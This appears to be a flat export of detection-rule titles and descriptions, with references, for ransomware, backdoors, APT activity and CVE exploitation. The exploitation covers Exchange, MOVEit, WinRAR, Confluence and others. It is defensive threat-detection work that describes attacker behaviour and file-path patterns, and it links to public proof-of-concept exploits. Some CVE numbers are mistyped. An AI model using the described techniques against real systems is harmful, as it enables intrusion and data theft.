Potential Conti Ransomware Database Dumping Activity Via SQLCmd Detects a command used by conti to dump database https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15
DarkSide Ransomware Pattern Detects DarkSide Ransomware and helpers https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/, https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2
Potential Devil Bait Related Indicator Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
Potential Devil Bait Malware Reconnaissance Detects specific process behavior observed with Devil Bait samples https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior
Devil Bait Potential C2 Communication Traffic Detects potential C2 communication related to Devil Bait malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
FoggyWeb Backdoor DLL Loading Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
Goofy Guineapig Backdoor IOC Detects malicious indicators seen used by the Goofy Guineapig malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential Goofy Guineapig Backdoor Activity Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential Goofy Guineapig GoolgeUpdate Process Anomaly Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Goofy Guineapig Backdoor Potential C2 Communication Detects potential C2 communication related to Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Goofy Guineapig Backdoor Service Creation Detects service creation persistence used by the Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Moriya Rootkit File Created Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
Pingback Backdoor File Indicators Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Pingback Backdoor DLL Loading Activity Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Pingback Backdoor Activity Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Small Sieve Malware File Indicator Creation Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Small Sieve Malware CommandLine Indicator Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Small Sieve Malware Potential C2 Communication Detects potential C2 communication related to Small Sieve malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Small Sieve Malware Registry Persistence Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
HAFNIUM Exchange Exploitation Activity Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3, https://twitter.com/GadixCRK/status/1369313704869834753?s=20, https://twitter.com/BleepinComputer/status/1372218235949617161
Exchange Exploitation Used by HAFNIUM Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
REvil Kaseya Incident Malware Patterns Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers, https://www.joesandbox.com/analysis/443736/0/html, https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b, https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/, https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
APT PRIVATELOG Image Load Pattern Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
SOURGUM Actor Behaviours Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection, https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml, https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
DEWMODE Webshell Access Detects access to DEWMODE webshell as described in FIREEYE report https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion
Potential CVE-2023-21554 QueueJumper Exploitation Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/
Potential CVE-2022-21587 Exploitation Attempt Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution. https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/, https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis, https://github.com/hieuminhnv/CVE-2022-21587-POC, https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application. https://blog.morphisec.com/vmware-identity-manager-attack-backdoor, https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC
CVE-2022-24527 Microsoft Connected Cache LPE Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
Potential CVE-2022-26809 Exploitation Attempt Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809, https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html, https://twitter.com/cyb3rops/status/1514217991034097664, https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/
Zimbra Collaboration Suite Email Server Unauthenticated RCE Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/, https://www.yang99.top/index.php/archives/82/, https://github.com/vnhacker1337/CVE-2022-27925-PoC
Potential CVE-2022-29072 Exploitation Attempt Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. https://github.com/kagancapar/CVE-2022-29072, https://twitter.com/kagancapar/status/1515219358234161153
CVE-2022-31659 VMware Workspace ONE Access RCE Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659 https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
Suspicious Set Value of MSDT in Registry (CVE-2022-30190) Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
CVE-2022-31656 VMware Workspace ONE Access Auth Bypass Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
Apache Spark Shell Command Injection - Weblogs Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files
Atlassian Bitbucket Command Injection Via Archive API Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804 https://twitter.com/_0xf4n9x_/status/1572052954538192901, https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/, https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html, https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/
Potential OWASSRF Exploitation Attempt - Proxy Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
OWASSRF Exploitation Attempt Using Public POC - Proxy Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
Potential OWASSRF Exploitation Attempt - Webserver Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
OWASSRF Exploitation Attempt Using Public POC - Webserver Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
Suspicious Sysmon as Execution Parent Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120, https://twitter.com/filip_dragovic/status/1590052248260055041, https://twitter.com/filip_dragovic/status/1590104354727436290
Exploitation Indicator Of CVE-2022-42475 Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd. https://www.fortiguard.com/psirt/FG-IR-22-398, https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/, https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/, https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877 https://seclists.org/fulldisclosure/2023/Jan/1, https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/
Potential CVE-2022-46169 Exploitation Attempt Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169 https://github.com/0xf4n9x/CVE-2022-46169, https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf, https://github.com/rapid7/metasploit-framework/pull/17407
MSSQL Extended Stored Procedure Backdoor Maggie This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
BlueSky Ransomware Artefacts Detect access to files and shares with names and extensions used by BlueSky ransomware which could indicate a current or previous encryption attempt. https://unit42.paloaltonetworks.com/bluesky-ransomware/
Potential Bumblebee Remote Thread Creation Detects remote thread injection events based on action seen used by bumblebee https://thedfirreport.com/2022/09/26/bumblebee-round-two/
ChromeLoader Malware Execution Detects execution of ChromeLoader malware via a registered scheduled task https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER, https://twitter.com/th3_protoCOL/status/1480621526764322817, https://twitter.com/Kostastsale/status/1480716528421011458, https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd
Emotet Loader Execution Via .LNK File Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign. https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338, https://twitter.com/Cryptolaemus1/status/1517634855940632576, https://tria.ge/220422-1pw1pscfdl/, https://tria.ge/220422-1nnmyagdf2/
Hermetic Wiper TG Process Patterns Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Raspberry Robin Subsequent Execution of Commands Detects raspberry robin subsequent execution of commands. https://redcanary.com/blog/raspberry-robin/
Raspberry Robin Initial Execution From External Drive Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". https://redcanary.com/blog/raspberry-robin/
Serpent Backdoor Payload Execution Via Scheduled Task Detects post exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method. It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload. https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
Potential Raspberry Robin Dot Ending File Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
Potential ACTINIUM Persistence Activity Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
FakeUpdates/SocGholish Activity Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. https://twitter.com/th3_protoCOL/status/1536788652889497600, https://twitter.com/1ZRR4H/status/1537501582727778304
MERCURY APT Activity Detects suspicious command line patterns seen being used by MERCURY APT https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
MSMQ Corrupted Packet Encountered Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21. https://www.tenable.com/security/research/tra-2023-11, https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py, https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
Exploitation Indicators Of CVE-2023-20198 Detecting exploitation indicators of CVE-2023-20198 a privilege escalation vulnerability in Cisco IOS XE Software Web UI. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z, https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
Potential CVE-2023-2283 Exploitation Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation. https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20, https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420, https://nvd.nist.gov/vuln/detail/CVE-2023-2283, https://www.blumira.com/cve-2023-2283/, https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283
Outlook Task/Note Reminder Received Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
CVE-2023-23397 Exploitation Attempt Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/
Potential CVE-2023-23397 Exploitation Attempt - SMB Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
Potential CVE-2023-23752 Exploitation Attempt Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla https://xz.aliyun.com/t/12175, https://twitter.com/momika233/status/1626464189261942786
Potential CVE-2023-25157 Exploitation Attempt Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer https://github.com/win3zz/CVE-2023-25157, https://twitter.com/parzel2/status/1665726454489915395, https://github.com/advisories/GHSA-7g5f-wrx8-5ccf
Potential CVE-2023-25717 Exploitation Attempt Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363, https://www.zerodayinitiative.com/advisories/ZDI-23-491/, https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/
Potential CVE-2023-27997 Exploitation Indicators Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter https://blog.lexfo.fr/Forensics-xortigate-notice.html, https://blog.lexfo.fr/xortigate-cve-2023-27997.html, https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/, https://labs.watchtowr.com/xortigate-or-cve-2023-27997/
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity Detects file indicators of potential exploitation of MOVEit CVE-2023-34362. https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/, https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/, https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated. https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response, https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362 https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36884 Exploitation Dropped File Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit, https://twitter.com/wdormann/status/1679184475677130755, https://twitter.com/r00tbsd/status/1679042071477338114/photo/1
Potential CVE-2023-36884 Exploitation Pattern Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2303-36884 URL Request Pattern Traffic Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - File Downloads Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - URL Marker Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - Share Access Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
CVE-2023-40477 Potential Exploitation - .REV File Creation Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
CVE-2023-40477 Potential Exploitation - WinRAR Application Crash Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html
